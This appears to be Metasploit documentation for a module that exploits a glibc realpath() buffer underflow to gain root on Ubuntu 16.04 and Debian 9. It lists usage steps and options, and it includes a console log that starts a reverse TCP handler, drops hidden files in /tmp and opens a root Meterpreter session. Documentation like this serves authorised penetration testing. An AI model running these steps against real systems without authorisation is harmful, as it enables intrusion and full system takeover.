## Description This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions `2.23-0ubuntu9` and `2.24-11+deb9u1`. The target system must have unprivileged user namespaces enabled. ## Vulnerable Application This module has been tested successfully on: * Ubuntu Linux 16.04.3 (x86_64) with glibc version `2.23-0ubuntu9` * Debian 9.0 (x86_64) with glibc version `2.24-11+deb9u1` ## Verification Steps 1. Start `msfconsole` 2. Get a session 3. `use exploit/linux/local/glibc_realpath_priv_esc` 4. `set SESSION [SESSION]` 5. `check` 6. `run` 7. You should get a new *root* session ## Options **SESSION** Which session to use, which can be viewed with `sessions` **WritableDir** A writable directory file system path. (default: `/tmp`) **COMPILE** Options: `Auto` `True` `False` (default: `Auto`) Whether the exploit should be live compiled with `gcc` on the target system, or uploaded as a pre-compiled binary. `Auto` will first determine if `gcc` is installed to compile live on the system, and fall back to uploading a pre-compiled binary. ## Scenarios ``` msf5 > use exploit/linux/local/glibc_realpath_priv_esc msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1 session => 1 msf5 exploit(linux/local/glibc_realpath_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ... [*] Writing '/tmp/.Piya56UZVV' (207 bytes) ... [*] Launching exploit... [*] Sending stage (853256 bytes) to 172.16.191.171 meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > sysinfo Computer : 172.16.191.171 OS : Ubuntu 16.04 (Linux 4.10.0-28-generic) Architecture : x64 BuildTuple : i486-linux-musl Meterpreter : x86/linux ```